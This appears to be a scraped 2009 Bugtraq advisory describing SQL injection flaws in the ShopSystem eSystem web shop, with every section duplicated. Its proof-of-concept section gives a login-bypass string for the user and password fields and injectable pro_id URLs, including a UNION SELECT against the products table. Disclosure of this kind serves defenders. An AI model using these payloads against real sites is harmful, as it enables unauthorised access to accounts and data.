ShopSystem eSystem Multiple SQL Injection Vulnerabilities
BID:33463
Info
ShopSystem eSystem Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 33463 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 26 2009 12:00AM |
| Updated: | Jan 28 2009 08:19PM |
| Credit: | Cyb3r-1sT |
| Vulnerable: |
ShopSystem eSystem 0 |
| Not Vulnerable: | |
Discussion
ShopSystem eSystem Multiple SQL Injection Vulnerabilities
eSystem is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eSystem is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
ShopSystem eSystem Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example input and URIs are available:
http://www.example.com/logon.asp
user : Gaza ' or ' Gaza=Victory--
pass : Gaza ' or ' Gaza=Victory--
http://www.example.com/Pop.asp?pro_id=[sql]
http://www.example.com/addtobasket.asp?pro_id=[sql]
http://www.example.com/Pop.asp?pro_id=-1+union+select+product_id,1,2+from+products&ID=
Attackers can use a browser to exploit these issues.
The following example input and URIs are available:
http://www.example.com/logon.asp
user : Gaza ' or ' Gaza=Victory--
pass : Gaza ' or ' Gaza=Victory--
http://www.example.com/Pop.asp?pro_id=[sql]
http://www.example.com/addtobasket.asp?pro_id=[sql]
http://www.example.com/Pop.asp?pro_id=-1+union+select+product_id,1,2+from+products&ID=
Solution / Fix
ShopSystem eSystem Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ShopSystem eSystem Multiple SQL Injection Vulnerabilities
References:
References:
- ShopSystem Homepage (ShopSystem)